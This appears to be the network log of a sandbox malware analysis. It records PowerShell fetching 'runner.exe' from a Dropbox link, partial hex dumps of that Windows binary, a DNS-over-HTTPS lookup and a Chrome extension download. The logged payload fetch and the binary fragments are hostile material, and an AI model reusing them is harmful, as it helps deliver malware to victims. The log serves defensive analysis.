2024-12-17 11:14:09 UTC	16384	IN	Data Raw: 8f d8 13 a1 12 95 e0 57 32 b8 17 bc 75 cf 82 5b 28 42 fa 52 c5 ac 5b 23 4d d8 cb 31 ce ca 49 a8 f1 ea b5 5b 9e c6 26 72 df 67 e7 5d d6 df 8e de d1 9f b0 a8 4f 2c 9b 1f a2 37 bf e2 64 a3 73 61 47 7d a2 1e 1a 48 dc 22 34 9b cf 45 5e 24 d9 84 e3 ef b5 eb c3 e6 02 af 9a 7b 07 cf 31 5d 6c 4d 20 dc fb c6 87 d6 6b 5a 68 f6 2f cf fb fa 2b fa be a4 23 6f b4 b6 cd a7 7d fb 15 58 bf cb f5 e5 dc 33 3d f1 e4 db 6f e8 d7 5f ee bb 2a 8a c1 ab d1 3a cf 59 ce ff ac 2e ae f7 b4 ce 73 5b f5 3a 30 f2 9c d3 cf 35 fe 1c 57 13 34 4c 15 c3 68 2b 6e e1 6f e1 56 17 0f 86 c4 68 c5 a1 51 9e fb 4d e5 35 ad f8 15 2f 0e 96 92 65 92 eb 8d b2 ec 47 9b 8e 35 84 25 4d 4c 53 52 99 2c 08 d8 e0 31 72 f6 6c a1 75 5e a1 ff ab 87 69 a1 ce 5f eb 35 f7 a4 fc 50 d7 0d fe 86 77 aa 7a 36 f5 51 77 79 Data Ascii: W2u[(BR[#M1I[&rg]O,7dsaG}H"4E^${1]lM kZh/+#o}X3=o_*:Y.s[:05W4Lh+noVhQM5/eG5%MLSR,1rlu^i_5Pwz6Qwy
2024-12-17 11:14:09 UTC	16384	IN	Data Raw: ea 78 00 e3 ab 11 42 b5 cc 67 c8 03 e0 d9 c1 8d 6e 9a c0 18 a7 1e 40 2c 98 58 94 15 21 98 5c 84 61 16 4c 5a 01 4e 60 7c db 38 27 09 a4 41 d4 97 07 40 c7 32 ec 30 80 87 93 31 c8 77 81 f5 ae b3 89 ac 46 52 1d 04 0f 50 86 1e 0c 4e ff b6 55 61 45 e4 ca c1 89 80 67 54 8d a0 6b 7b 81 21 6c cf c8 42 82 5e bd 53 93 85 dc 0b 62 da 91 1d 52 8c 7c 7c 40 1e c4 4d 51 8b bd 59 11 22 33 aa a4 15 32 19 f3 4a bd 70 76 23 f5 5a a7 84 74 69 aa 50 44 07 b4 76 e7 a6 09 aa 12 af 67 ed 9a b6 64 34 f9 9d 39 94 04 33 ea 4a 60 2e b1 91 e5 8c 8a fb 20 7e 78 51 8a 03 8a 29 18 8b 5a e1 24 95 7a e3 de 94 97 96 82 df ee 5a 37 3a 6e 8d ae 1b f5 5f 77 ee cd 66 dc e2 56 7a 5c 37 db 30 e0 56 b6 b9 56 80 36 b4 31 60 ea 86 a8 a0 50 af e2 85 19 41 ce 32 da a7 53 95 7c 52 c9 97 03 2a eb 68 a0 Data Ascii: xBgn@,X!\aLZN`\|8'A@201wFRPNUaEgTk{!lB^SbR\|\|@MQY"32Jpv#ZtiPDvgd493J`. ~xQ)Z$zZ7:n_wfVz\70VV61`PA2S\|R*h
2024-12-17 11:14:09 UTC	16384	IN	Data Raw: 82 ef 79 9b 32 aa d2 30 41 20 90 12 45 c3 87 2a c6 0a a1 44 43 aa f6 56 ba 4c 8d 84 d9 db 12 a7 80 b2 c7 f0 95 cc 1b 8f 35 9d 68 14 4f 5e 58 b4 24 86 88 36 d2 e7 22 05 f2 4b 02 ac 2f 29 72 4a f0 2b 7c 6f 36 0a 75 63 85 f7 41 d2 29 28 6b 02 26 47 27 64 30 55 a8 eb 11 31 a9 89 8c c4 b1 a0 c4 b0 64 ad f2 58 b3 62 3c c6 a9 a0 61 dd 3a cb 1a 57 bd 1b 4e 1c 41 e1 d9 fc 12 d6 6f ed e6 06 3f 4d 18 4f b6 de 05 cd 68 4d c3 d5 54 48 34 87 c0 a0 f0 7f c9 84 f1 67 c3 0f a4 ad 86 88 0c 5c ea 66 3f d2 67 bc f7 7b e2 15 2a 02 e2 29 5a 1d 23 b5 89 a9 99 5c 17 43 91 1a 11 7e bb 30 66 2f 0c 61 0c 21 5a 42 e2 20 f0 42 14 9d b8 26 37 41 a9 23 c0 d5 de d8 ea e3 af 2c 42 14 36 a2 b5 4a 01 82 7e 03 36 64 0a ac 08 40 d0 64 40 3c c6 b0 fd 65 4b 51 13 16 df 63 ce 86 84 0e e8 ac 35 Data Ascii: y20A EDCVL5hO^X$6"K/)rJ+\|o6ucA)(k&G'd0U1dXb<a:WNAo?MOhMTH4g\f?g{)Z#\C~0f/a!ZB B&7A#,B6J~6d@d@<eKQc5

Timestamp	Bytes transferred	Direction	Data
2024-12-17 11:14:13 UTC	212	OUT	GET /scl/fi/g33vds4uvy26a8v7ble7g/runner.exe?rlkey=cqe2asmea4sh0uo2xxsstxzdd&dl=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: www.dropbox.com
2024-12-17 11:14:15 UTC	4091	IN	HTTP/1.1 302 Found Content-Security-Policy: img-src https://* data: blob: ; media-src https://* blob: ; font-src https://* data: ; base-uri 'self' ; report-uri https://www.dropbox.com/csp_log?policy_name=metaserver-whitelist ; frame-src https://* carousel: dbapi-6: dbapi-7: dbapi-8: dropbox-client: itms-apps: itms-appss: ; object-src 'self' https://cfl.dropboxstatic.com/static/ https://www.dropboxstatic.com/static/ ; child-src https://www.dropbox.com/static/serviceworker/ blob: ; frame-ancestors 'self' https://.dropbox.com ; style-src https:// 'unsafe-inline' 'unsafe-eval' ; worker-src https://www.dropbox.com/static/serviceworker/ https://www.dropbox.com/encrypted_folder_download/service_worker.js https://www.dropbox.com/service_worker.js blob: ; connect-src https://* ws://127.0.0.1:*/ws blob: wss://dsimports.dropbox.com/ ; form-action https://docs.google.com/document/fsip/ https://docs.google.com/spreadsheets/fsip/ https://docs.google.com/presentation/fsip/ https://docs.sandbox.google.com/document/fsip/ https://docs.sandbox. [TRUNCATED] Content-Type: text/html; charset=utf-8 Location: https://uc46828b6726c0397712b0c1f4ee.dl.dropboxusercontent.com/cd/0/get/CgZHOpNzhQw4YgiO7_Q1eiXI-xC_0JESI6SNiNP7CaPd1OJi9tRlu7r8wijxjLZyykc6Q1zEuEVi8G5U8BE_7agz1kxv7JuvJQO8rp8v1I6W6qhugEUNq9qs0rsQkKkEmZ-ThhGY4RjrXNSPySTfU1qW/file?dl=1# Pragma: no-cache Referrer-Policy: strict-origin-when-cross-origin Set-Cookie: gvc=MTU3ODA4MDg5NTU4NTgwNjExMjc1Njc2Mzk5NTA2MzkwNDU4MDg2; Path=/; Expires=Sun, 16 Dec 2029 11:14:14 GMT; HttpOnly; Secure; SameSite=None Set-Cookie: t=Fb7I1NHXrWslrIWzfDCU3ihu; Path=/; Domain=dropbox.com; Expires=Wed, 17 Dec 2025 11:14:14 GMT; HttpOnly; Secure; SameSite=None Set-Cookie: __Host-js_csrf=Fb7I1NHXrWslrIWzfDCU3ihu; Path=/; Expires=Wed, 17 Dec 2025 11:14:14 GMT; Secure; SameSite=None Set-Cookie: __Host-ss=A9VrEOg4Z4; Path=/; Expires=Wed, 17 Dec 2025 11:14:14 GMT; HttpOnly; Secure; SameSite=Strict Set-Cookie: locale=en; Path=/; Domain=dropbox.com; Expires=Sun, 16 Dec 2029 11:14:14 GMT X-Content-Type-Options: nosniff X-Permitted-Cross-Domain-Policies: none X-Robots-Tag: noindex, nofollow, noimageindex X-Xss-Protection: 1; mode=block Content-Length: 17 Date: Tue, 17 Dec 2024 11:14:14 GMT Strict-Transport-Security: max-age=31536000; includeSubDomains Server: envoy Cache-Control: no-cache, no-store X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: 22f829e0ae0c4281a5b2cef2a78ac118 Connection: close
2024-12-17 11:14:15 UTC	17	IN	Data Raw: 3c 21 2d 2d 73 74 61 74 75 73 3d 33 30 32 2d 2d 3e Data Ascii: ...status=302-->

Timestamp	Bytes transferred	Direction	Data
2024-12-17 11:14:16 UTC	370	OUT	GET /cd/0/get/CgZHOpNzhQw4YgiO7_Q1eiXI-xC_0JESI6SNiNP7CaPd1OJi9tRlu7r8wijxjLZyykc6Q1zEuEVi8G5U8BE_7agz1kxv7JuvJQO8rp8v1I6W6qhugEUNq9qs0rsQkKkEmZ-ThhGY4RjrXNSPySTfU1qW/file?dl=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: uc46828b6726c0397712b0c1f4ee.dl.dropboxusercontent.com Connection: Keep-Alive
2024-12-17 11:14:17 UTC	739	IN	HTTP/1.1 200 OK Content-Type: application/binary Accept-Ranges: bytes Cache-Control: max-age=60 Content-Disposition: attachment; filename="runner.exe"; filename*=UTF-8''runner.exe Content-Security-Policy: sandbox Etag: 1734099436681829d Pragma: public Referrer-Policy: no-referrer Vary: Origin X-Content-Security-Policy: sandbox X-Content-Type-Options: nosniff X-Robots-Tag: noindex, nofollow, noimageindex X-Server-Response-Time: 274 X-Webkit-Csp: sandbox Date: Tue, 17 Dec 2024 11:14:17 GMT Server: envoy Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Content-Length: 25100288 X-Dropbox-Response-Origin: far_remote X-Dropbox-Request-Id: 76661cb1bc6f4dd4898785ddfd72f1ed Connection: close
2024-12-17 11:14:17 UTC	15645	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 28 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 7a b1 4e 09 3e d0 20 5a 3e d0 20 5a 3e d0 20 5a a9 14 5e 5a 3a d0 20 5a 19 16 5d 5a 7d d0 20 5a c1 f0 24 5a 3c d0 20 5a 6a f3 11 5a 3f d0 20 5a 19 16 4d 5a a0 d1 20 5a 3b dc 7d 5a 3c d0 20 5a fd df 40 5a 3f d0 20 5a fd df 7d 5a 25 d0 20 5a fd df 7f 5a 3d d0 20 5a 19 16 5b 5a 38 d0 20 5a 3e d0 21 5a 38 d1 20 5a 19 16 4e 5a ee dc 20 5a 19 16 5a 5a 3f d0 20 5a 19 16 5c 5a 3f d0 20 Data Ascii: MZ@(!L!This program cannot be run in DOS mode.$zN> Z> Z> Z^Z: Z]Z} Z$Z< ZjZ? ZMZ Z;}Z< Z@Z? Z}Z% ZZ= Z[Z8 Z>!Z8 ZNZ ZZZ? Z\Z?
2024-12-17 11:14:17 UTC	16384	IN	Data Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 81 ec 04 01 00 00 6a 01 6a 1a 68 e0 85 99 01 6a 00 ff 15 90 0d 9d 02 68 10 7d 68 01 68 04 01 00 00 68 e0 85 99 01 e8 e8 5a 5b 00 83 c4 0c 6a 00 68 e0 85 99 01 6a 00 ff 15 94 0d 9d 02 68 e0 85 99 01 8d 44 24 04 68 04 01 00 00 50 e8 f1 5b 5b 00 68 34 7f 68 01 8d 4c 24 10 68 04 01 00 00 51 e8 ae 5a 5b 00 68 bc 7c 68 01 8d 54 24 1c 68 04 01 00 00 52 e8 9a 5a 5b 00 8b 8c 24 30 01 00 00 8b 94 24 2c 01 00 00 83 c4 24 8d 04 24 50 51 52 68 98 7f 68 01 68 b0 7f 68 01 68 a8 7f 68 01 ff 15 9c 0a 9d 02 81 c4 04 01 00 00 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: jjhjh}hhhZ[jhjhD$hP[[h4hL$hQZ[h\|hT$hRZ[$0$,$$PQRhhhhhh
2024-12-17 11:14:17 UTC	739	IN	Data Raw: cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii:
2024-12-17 11:14:18 UTC	16384	IN	Data Raw: d8 1b c0 f7 d8 c3 cc cc cc cc cc cc cc cc cc cc 0f b6 44 24 04 0f b6 80 b8 77 88 01 d1 e8 83 e0 01 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 44 24 04 89 41 14 c2 04 00 cc cc cc cc cc cc 8b 44 24 04 89 41 18 c2 04 00 cc cc cc cc cc cc 8b 44 24 04 89 41 1c c2 04 00 cc cc cc cc cc cc e9 19 31 5b 00 cc cc cc cc cc cc cc cc cc cc cc e9 4f 18 5b 00 cc cc cc cc cc cc cc cc cc cc cc e9 29 33 5b 00 cc cc cc cc cc cc cc cc cc cc cc 83 c1 08 b8 01 00 00 00 f0 0f c1 01 c3 cc cc cc 8b 41 0c c3 cc cc cc cc cc cc cc cc cc cc cc cc 8b 44 24 08 8b 4c 24 04 50 51 b9 a8 32 9a 02 e8 5c 6a 4e 00 c3 cc cc cc cc cc cc cc cc cc cc cc 8b 44 24 04 50 b9 a8 32 9a 02 e8 71 5e 4e 00 c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8d 51 08 83 c8 ff f0 0f c1 02 48 a9 ff ff ff Data Ascii: D$wD$AD$AD$A1[O[)3[AD$L$PQ2\jND$P2q^NQH
2024-12-17 11:14:18 UTC	16384	IN	Data Raw: 89 48 04 c3 cc cc cc cc cc cc cc cc cc cc cc cc 53 33 db 83 c8 ff 56 8b f1 8d 4e 28 88 1e 88 5e 01 88 5e 02 88 5e 03 89 46 08 89 46 10 89 46 14 89 46 18 89 5e 1c 89 5e 20 e8 22 fc ff ff 89 5e 2c 8b c6 5e 5b c3 cc cc cc cc cc cc cc cc cc cc 8b 44 24 08 85 c0 75 05 e8 73 99 4e 00 50 e8 9d 99 4e 00 6a ff 50 8d 44 24 14 6a 04 50 e8 ac ec 5a 00 8b 54 24 18 8d 4c 24 1c 51 68 34 92 68 01 52 e8 fa f9 ff ff 83 c4 20 c3 cc cc cc cc cc cc 6a ff 68 18 60 52 01 64 a1 00 00 00 00 50 56 a1 ac e8 8e 01 33 c4 50 8d 44 24 08 64 a3 00 00 00 00 8b 74 24 24 83 fe 0a 75 0b a1 48 b4 99 01 85 c0 74 02 ff d0 b9 54 b4 99 01 c7 44 24 24 54 b4 99 01 e8 d9 84 00 00 8b 44 24 1c 8b 4c 24 18 85 c9 c7 44 24 10 00 00 00 00 89 70 14 c7 40 10 00 00 00 00 74 05 e8 c6 af 00 00 b9 54 b4 99 01 Data Ascii: HS3VN(^^^FFFF^^ "^,^[D$usNPNjPD$jPZT$L$Qh4hR jh`RdPV3PD$dt$$uHtTD$$TD$L$D$p@tT
2024-12-17 11:14:18 UTC	16384	IN	Data Raw: 57 8b 7c 24 10 85 ff 76 1b 8b 4c 24 0c 8b 54 24 08 56 8b f7 8a 02 88 01 83 c1 01 83 c2 01 83 ee 01 75 f1 5e 8b c7 5f c3 cc cc cc cc cc cc cc cc 8b 44 24 04 8b 4c 24 08 56 8b 74 24 10 56 50 51 e8 5b be 5a 00 83 c4 0c 8b c6 5e c3 cc cc cc cc 8b 4c 24 04 8b 44 24 0c 0f b6 11 50 8b 44 24 0c 52 50 e8 69 c5 5a 00 83 c4 0c 33 c0 c3 cc cc cc 8a 81 7c 03 00 00 c6 81 7c 03 00 00 00 c3 cc cc c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 44 24 0c c7 00 a9 00 00 00 b0 01 c2 0c 00 cc c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc c3 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 8b 41 20 8b 80 1c 02 00 00 c3 cc cc cc cc cc cc 8b 41 20 8b 80 20 02 00 00 c3 cc cc cc cc cc Data Ascii: W\|$vL$T$Vu^_D$L$Vt$VPQ[Z^L$D$PD$RPiZ3\|\|D$A A
2024-12-17 11:14:18 UTC	16384	IN	Data Raw: b0 01 5e c2 04 00 cc cc cc cc cc cc cc cc cc cc 83 ec 08 56 8b f1 8b 56 10 8d 44 24 08 50 8d 4c 24 08 51 68 80 00 00 00 68 ff ff 00 00 52 c7 44 24 1c 04 00 00 00 ff 15 14 0f 9d 02 8b 44 24 10 66 3b 44 24 06 74 41 8b 56 10 66 89 44 24 06 8b 44 24 08 50 8d 4c 24 08 51 68 80 00 00 00 68 ff ff 00 00 52 c7 46 08 00 00 00 00 ff 15 18 0f 9d 02 83 f8 ff 75 12 ff 15 20 0f 9d 02 89 46 08 32 c0 5e 83 c4 08 c2 04 00 b0 01 5e 83 c4 08 c2 04 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 83 ec 08 56 8b f1 8b 56 10 8d 44 24 08 50 8d 4c 24 08 51 68 80 00 00 00 68 ff ff 00 00 52 c7 44 24 1c 04 00 00 00 ff 15 14 0f 9d 02 8a 44 24 10 33 c9 66 39 4c 24 04 0f b6 d0 0f 95 c1 3b d1 74 48 8b 54 24 08 33 c9 84 c0 0f 95 c1 52 8d 44 24 08 50 68 80 00 00 00 68 ff ff 00 00 c7 46 08 Data Ascii: ^VVD$PL$QhhRD$D$f;D$tAVfD$D$PL$QhhRFu F2^^VVD$PL$QhhRD$D$3f9L$;tHT$3RD$PhhF
2024-12-17 11:14:18 UTC	16384	IN	Data Raw: 01 7c 30 0c 8d 74 30 0c 8b 71 1c 01 7c 30 10 85 d2 8d 74 30 10 0f 85 75 ff ff ff 5f 5e 5b c2 08 00 cc cc cc cc cc cc cc cc cc cc cc cc cc cc cc 53 56 57 8b f1 8d 46 04 68 00 10 00 00 50 89 06 ff 15 34 0c 9d 02 8b 3d 50 0c 9d 02 33 db 53 53 6a 01 53 c7 46 1c ff ff ff ff 89 5e 20 89 5e 24 89 5e 28 ff d7 53 53 53 53 89 46 2c ff d7 53 53 6a 01 89 46 4c 53 89 5e 6c ff d7 53 53 53 53 89 46 70 ff d7 89 86 90 00 00 00 5f 89 9e b0 00 00 00 8b c6 5e 5b c3 cc cc cc cc cc cc cc cc cc cc 56 8b f1 8b 06 50 ff 15 40 0c 9d 02 83 46 24 01 83 7e 28 00 7e 09 56 8d 4e 2c e8 e1 61 01 00 83 7e 20 00 7d 1a 57 8d 7e 2c 8d a4 24 00 00 00 00 56 8b cf e8 c8 61 01 00 83 7e 20 00 7c f2 5f 83 46 20 01 83 46 24 ff 8b 0e 51 ff 15 44 0c 9d 02 5e c3 cc cc cc cc cc cc cc cc cc cc cc cc cc Data Ascii: \|0t0q\|0t0u_^[SVWFhP4=P3SSjSF^ ^$^(SSSSF,SSjFLS^lSSSSFp_^[VP@F$~(~VN,a~ }W~,$Va~ \|_F F$QD^
2024-12-17 11:14:18 UTC	16384	IN	Data Raw: 14 89 44 24 2c 8b bc 24 88 01 00 00 66 83 7d 00 2e 0f 85 7e 00 00 00 0f b7 45 02 83 c5 02 66 3d 2a 00 89 6c 24 14 89 54 24 30 75 21 8b 07 83 c7 04 83 c5 02 3b c3 89 bc 24 88 01 00 00 89 6c 24 14 7d 4e 89 5c 24 30 89 5c 24 1c eb 48 66 3d 30 00 72 42 66 3d 39 00 77 3c 0f b7 4d 02 83 c5 02 0f b7 c0 83 e8 30 66 83 f9 30 89 6c 24 14 72 21 66 83 f9 39 77 17 8d 14 80 83 c5 02 0f b7 c1 0f b7 4d 00 66 83 f9 30 8d 44 50 d0 73 e3 89 6c 24 14 89 44 24 1c 0f b7 45 00 66 3d 68 00 ba 6c 00 00 00 74 05 66 3b c2 75 28 0f b7 c0 83 c5 02 66 3b c2 89 44 24 24 89 6c 24 14 75 15 66 39 55 00 75 0f 83 c5 02 c7 44 24 24 32 00 00 00 89 6c 24 14 0f b7 4d 00 0f b7 f1 0f b7 c6 83 c0 bc 83 f8 25 77 2c 0f b6 80 34 cb 41 00 ff 24 85 20 cb 41 00 be 64 00 00 00 eb 17 be 64 00 00 00 eb 0c Data Ascii: D$,$f}.~Ef=*l$T$0u!;$l$}N\$0\$Hf=0rBf=9w<M0f0l$r!f9wMf0DPsl$D$Ef=hltf;u(f;D$$l$uf9UuD$$2l$M%w,4A$ Add
2024-12-17 11:14:18 UTC	16384	IN	Data Raw: 01 8b 46 20 8b 48 38 83 c4 08 85 c9 74 0d 6a 02 56 50 8b 40 3c 50 ff d1 83 c4 10 8b c5 5f 5e 5d 5b c2 14 00 cc cc cc cc cc cc cc cc cc cc cc cc 53 8b 5c 24 10 56 8b f1 8b 46 44 8b 56 40 57 33 ff 3b d8 77 5b 8b 4c 24 14 72 04 3b ca 73 51 8b 7c 24 10 2b d1 55 1b c3 33 ed 3b e8 5d 77 06 72 06 3b fa 72 02 8b fa 8b 44 24 24 8b 54 24 20 50 8b 44 24 20 52 8b 56 48 50 8b 46 4c 03 d1 8b 4e 20 13 c3 50 52 57 57 6a 00 56 e8 91 f9 ff ff 85 c0 74 3e 01 7e 10 5f 83 56 14 00 5e 5b c2 18 00 8d 4c 24 10 51 6a 00 c7 44 24 18 02 00 00 00 ff 15 14 64 88 01 8b 46 20 8b 48 38 83 c4 08 85 c9 74 0d 8b 50 3c 6a 02 56 50 52 ff d1 83 c4 10 8b c7 5f 5e 5b c2 18 00 cc cc cc cc cc cc cc cc cc 53 55 56 8b f1 8b 5e 3c 8b 46 44 8b 6e 38 8b 56 40 57 33 ff 3b d8 77 5f 72 04 3b ea 73 59 8b Data Ascii: F H8tjVP@<P_^][S\$VFDV@W3;w[L$r;sQ\|$+U3;]wr;rD$$T$ PD$ RVHPFLN PRWWjVt>~_V^[L$QjD$dF H8tP<jVPR_^[SUV^<FDn8V@W3;w_r;sY

Timestamp	Bytes transferred	Direction	Data
2024-12-17 11:14:21 UTC	245	OUT	POST /dns-query HTTP/1.1 Host: chrome.cloudflare-dns.com Connection: keep-alive Content-Length: 128 Accept: application/dns-message Accept-Language: * User-Agent: Chrome Accept-Encoding: identity Content-Type: application/dns-message
2024-12-17 11:14:21 UTC	128	OUT	Data Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom)TP
2024-12-17 11:14:22 UTC	247	IN	HTTP/1.1 200 OK Server: cloudflare Date: Tue, 17 Dec 2024 11:14:21 GMT Content-Type: application/dns-message Connection: close Access-Control-Allow-Origin: * Content-Length: 468 CF-RAY: 8f367d36cb9af795-EWR alt-svc: h3=":443"; ma=86400
2024-12-17 11:14:22 UTC	468	IN	Data Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 10 00 04 8e fb 28 63 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: wwwgstaticcom(c)

Timestamp	Bytes transferred	Direction	Data
2024-12-17 11:14:21 UTC	594	OUT	GET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1 Host: clients2.googleusercontent.com Connection: keep-alive Sec-Fetch-Site: none Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: empty User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47 Accept-Encoding: gzip, deflate, br Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
2024-12-17 11:14:22 UTC	570	IN	HTTP/1.1 200 OK X-GUploader-UploadID: AFiumC4OsGezS1pMdh9K8knZ7w7YXoUgynQ7fG8Bc6GtPymzTVN2DAFDL8OXHcjdR75lz0PiibZjbNE Accept-Ranges: bytes Content-Length: 154477 X-Goog-Hash: crc32c=F5qq4g== Server: UploadServer Date: Tue, 17 Dec 2024 07:44:08 GMT Expires: Wed, 17 Dec 2025 07:44:08 GMT Cache-Control: public, max-age=31536000 Age: 12614 Last-Modified: Thu, 12 Dec 2024 15:58:04 GMT ETag: a01bfa19_322860b8_b556d942_61bcf747_a602b083 Content-Type: application/x-chrome-extension Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Connection: close
2024-12-17 11:14:22 UTC	820	IN	Data Raw: 43 72 32 34 03 00 00 00 f3 15 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 9c 5e d1 18 b0 31 22 89 f4 fd 77 8d 67 83 0b 74 fd c3 32 4a 0e 47 31 00 29 58 34 b1 bf 3d 26 90 3f 5b 6a 2c 4c 7a fd d5 6a b0 75 cf 65 5b 49 85 71 2a 42 61 2f 58 dd ee dc 50 c1 68 fc cd 84 4c 04 88 b9 99 dc 32 25 33 5f 6f f4 ae b5 ad 19 0d d4 b8 48 f7 29 27 b9 3d d6 95 65 f8 ac c8 9c 3f 15 e6 ef 1f 08 ab 11 6a e1 a9 c8 33 55 48 fd 7c bf 58 8c 4d 06 e3 97 75 cc c2 9c 73 5b a6 2a f2 ea 3f 24 f3 9c db 8a 05 9f 46 25 11 1d 18 b4 49 08 19 94 80 29 08 f2 2c 2d c0 2f 90 65 35 29 a6 66 83 e7 4f e4 b2 71 14 5e ff 90 92 01 8d d3 bf ca a0 d0 39 a0 08 28 e3 d2 5f d5 70 68 32 fe 10 5e d5 59 42 50 58 66 5f 38 cc 0b 08 Data Ascii: Cr240"0H0^1"wgt2JG1)X4=&?[j,Lzjue[IqBa/XPhL2%3_oH)'=e?j3UH\|XMus[*?$F%I),-/e5)fOq^9(_ph2^YBPXf_8
2024-12-17 11:14:22 UTC	1390	IN	Data Raw: d5 b5 fc 3c 0f e3 f9 d2 ff f8 fb 8f f1 b3 aa ea fc 5a ff 65 a8 3e ff f2 76 56 d5 8f bf fe b8 9e df fb 4a fe 2c 2f fd 58 f5 e3 8f bf ff eb c7 90 3f d4 25 97 fa fc ea 11 36 05 b0 0d c1 6d 23 05 75 5d 82 5a 95 8f c3 96 5b d7 73 d6 4d 5f 19 18 df 4a a0 b6 22 39 6c 91 fb 6c a3 f3 fd 2c 7c d5 8b 14 19 87 e6 72 d6 e7 d7 51 43 c1 e1 fb ef 9d ba 8a 34 3a 9f d4 f8 cb a1 77 6a e9 bf 9f 4f e7 c3 14 35 ef b7 d2 b7 fb ef 73 ca 6e f7 25 e1 ee 92 a5 e8 f2 fd 79 01 10 17 0f 63 e2 fc fd 91 b4 23 46 0c 8e b4 1b 1b e1 a3 2e ef a8 29 67 76 28 cd 10 21 53 ec 49 17 3e f2 20 dc 54 be b0 c5 23 dc 1d 83 eb b9 f4 a1 91 ef 0f db 83 da 5d 0b 80 ea c2 67 f3 11 c0 ee 08 4c 55 5a a8 16 40 1f 77 c3 5c 80 cd f9 b8 0f 1f 05 d8 fd 7b 9d df f7 16 4e b9 a7 7a 66 d5 6e 02 19 3a 72 f1 95 74 0c Data Ascii: 